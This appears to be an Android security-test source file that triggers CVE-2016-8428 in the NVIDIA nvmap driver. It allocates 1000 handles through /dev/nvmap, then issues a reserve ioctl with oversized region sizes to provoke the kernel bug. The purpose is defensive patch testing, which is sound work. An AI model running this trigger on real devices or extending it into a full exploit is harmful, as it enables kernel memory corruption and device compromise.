Home | History | Annotate | Download | only in CVE-2016-8428 
      1 /*
      2  * Copyright (C) 2017 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include <stdlib.h>
     18 #include <errno.h>
     19 #include <unistd.h>
     20 #include <stdio.h>
     21 #include <dirent.h>
     22 #include <string.h>
     23 #include <sys/stat.h>
     24 #include <sys/ioctl.h>
     25 #include <stdio.h>
     26 #include <string.h>
     27 #include <dlfcn.h>
     28 #include <sys/time.h>
     29 #include <sys/mman.h>
     30 #include <sys/syscall.h>
     31 #include <sys/resource.h>
     32 #include <fcntl.h>
     33 #include <pthread.h>
     34 #include <unistd.h>
     35 #include <sched.h>
     36 
     37 
     38 struct nvmap_handle_param {
     39 	__u32 handle;		/* nvmap handle */
     40 	__u32 param;		/* size/align/base/heap etc. */
     41 	unsigned long result;	/* returns requested info*/
     42 };
     43 
     44 struct nvmap_create_handle {
     45 	union {
     46 		__u32 id;	/* FromId */
     47 		__u32 size;	/* CreateHandle */
     48 		__s32 fd;	/* DmaBufFd or FromFd */
     49 	};
     50 	__u32 handle;		/* returns nvmap handle */
     51 };
     52 
     53 struct nvmap_alloc_handle {
     54 	__u32 handle;		/* nvmap handle */
     55 	__u32 heap_mask;	/* heaps to allocate from */
     56 	__u32 flags;		/* wb/wc/uc/iwb etc. */
     57 	__u32 align;		/* min alignment necessary */
     58 };
     59 
     60 struct nvmap_cache_op_list {
     61 	__u64 handles;		/* Ptr to u32 type array, holding handles */
     62 	__u64 offsets;		/* Ptr to u32 type array, holding offsets
     63 				 * into handle mem */
     64 	__u64 sizes;		/* Ptr to u32 type array, holindg sizes of memory
     65 				 * regions within each handle */
     66 	__u32 nr;		/* Number of handles */
     67 	__s32 op;		/* wb/wb_inv/inv */
     68 };
     69 
     70 #define NVMAP_IOC_MAGIC 'N'
     71 #define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
     72 #define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
     73 #define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
     74 #define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
     75 #define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
     76 #define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
     77 #define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18,	struct nvmap_cache_op_list)
     78 
     79 /* common carveout heaps */
     80 #define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
     81 #define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
     82 #define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
     83 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
     84 
     85 #define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
     86 
     87 /* allocation flags */
     88 #define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
     89 #define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
     90 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
     91 #define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
     92 #define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
     93 
     94 #define NVMAP_HANDLE_SECURE          (0x1ul << 2)
     95 #define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
     96 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
     97 #define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
     98 #define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
     99 #define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
    100 enum {
    101 	NVMAP_PAGES_UNRESERVE = 0,
    102 	NVMAP_PAGES_RESERVE
    103 };
    104 int g_fd = -1;
    105 static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
    106 static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
    107 struct nvmap_create_handle* g_allocation = NULL;
    108 struct nvmap_alloc_handle g_real_alloc = {0};
    109 struct nvmap_cache_op_list g_op_list = {0};
    110 #define MAX_HANDLE_NUM (1000)
    111 int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
    112 int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
    113 
    114 int open_driver() {
    115     char* dev_path = "/dev/nvmap";
    116     g_fd = open(dev_path, O_RDWR);
    117     if (g_fd < 0) {
    118         printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
    119     } else {
    120         printf("[*] open file(%s) succ!\n", dev_path);
    121     }
    122     return g_fd;
    123 }
    124 
    125 int trigger_nvmap_create() {
    126     g_allocation->handle = -1;
    127     ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
    128     printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
    129     return g_allocation->handle;
    130 }
    131 
    132 void trigger_nvmap_alloc(int handle) {
    133     g_real_alloc.handle = handle;
    134     ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
    135     printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
    136 }
    137 
    138 void trigger_nvmap_free(int handle) {
    139     ioctl(g_fd, NVMAP_IOC_FREE, handle);
    140     printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
    141 }
    142 
    143 void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    144     setpriority(PRIO_PROCESS, gettid(), privi);
    145     printf("[*] setpriority(%d) errno = %d\n", privi, errno);
    146 
    147     /* bind process to a CPU*/
    148     if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
    149         printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
    150     }
    151 }
    152 
    153 void prepare_data() {
    154     int i;
    155     void* data = calloc(1, 0x1000);
    156 
    157     g_allocation = (struct nvmap_create_handle*)data;
    158     g_allocation->size = 0x40;
    159 
    160     g_real_alloc.align = 0x40;
    161     g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    162     g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    163 
    164     g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
    165     g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
    166     g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
    167     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
    168         ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
    169     }
    170     g_op_list.nr = MAX_HANDLE_NUM;
    171     g_op_list.op = NVMAP_PAGES_RESERVE;
    172 }
    173 
    174 
    175 void create_handles() {
    176     int i;
    177 
    178     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
    179         g_handles_for_alloc[i] = trigger_nvmap_create();
    180     }
    181 
    182 }
    183 
    184 
    185 void trigger_rw_handle(int handle) {
    186     ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
    187     printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
    188 }
    189 
    190 int main(int argc, char**argv) {
    191     int i;
    192 
    193     if (open_driver() < 0) {
    194         return -1;
    195     }
    196 
    197     prepare_data();
    198     create_handles();
    199 
    200     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
    201         trigger_nvmap_alloc(g_handles_for_alloc[i]);
    202     }
    203 
    204     printf("[*] Begin to trigger bug....\n");
    205     sleep(1);
    206 
    207 
    208     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
    209         trigger_rw_handle(g_handles_for_alloc[i]);
    210     }
    211 
    212     return 0;
    213 }
    214